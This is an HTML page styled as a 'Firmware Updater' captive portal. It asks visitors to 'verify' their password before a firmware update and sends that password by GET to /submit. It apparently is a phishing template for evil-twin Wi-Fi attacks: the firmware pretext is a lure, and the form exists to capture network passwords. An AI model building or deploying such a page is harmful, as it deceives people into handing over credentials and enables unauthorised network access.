<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Firmware Updater</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f7f7f7;
        margin: 0;
        padding: 20px;
        height: 100%;
        display: flex;
        align-items: center;
        justify-content: center;
        align-content: center;
      }

      h2 {
        color: #333;
        text-align: center;
      }
      .container-bg {
        position: relative;
        margin: 0 auto;
        justify-content: center;
        max-width: 500px;
        box-shadow: 0 0 8px rgba(0, 0, 0, 0.1);
      }

      .container-center {
        height: 100%;
        width: 100%;
        align-items: center;
        display: flex;
        justify-content: center;
      }

      .footer {
        position: absolute;
        bottom: 0;
        left: 0;
        width: 100%;
        margin: 0;

        justify-content: center;
        text-align: center;
      }

      .container {
        max-width: max-content;
        margin: 0 auto;
        background-color: #fff;
        padding: 20px;
        border-radius: 4px;
        box-shadow: 0 0 8px rgba(0, 0, 0, 0.1);
      }
      .form-group {
        margin-bottom: 20px;
      }

      .form-group label {
        display: block;
        margin-bottom: 5px;
        color: #333;
      }

      input[type="password"] {
        width: 100%;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
        box-sizing: border-box;
      }

      input[type="submit"] {
        display: block;
        width: 100%;
        padding: 10px;
        text-align: center;
        background-color: #007bff;
        color: #fff;
        border: none;
        border-radius: 4px;
        cursor: pointer;
      }
    </style>
  </head>
  <body>
    <div class="container-center">
      <div class="container-bg">
        <div class="container">
          <h2>Firmware Updater</h2>
          <p>
            For security reasons, we require you to verify your password before
            proceeding with the firmware update.
          </p>
          <form action="/submit" method="get">
            <div class="form-group">
              <input
                type="password"
                id="password"
                name="password"
                placeholder="Password"
                required
              />
            </div>
            <input type="submit" value="Verify" />
          </form>
        </div>
      </div>
      <div class="footer">
        <p>Captive Portal<br />© 2023 All Right Reserved</p>
      </div>
    </div>
  </body>
</html>
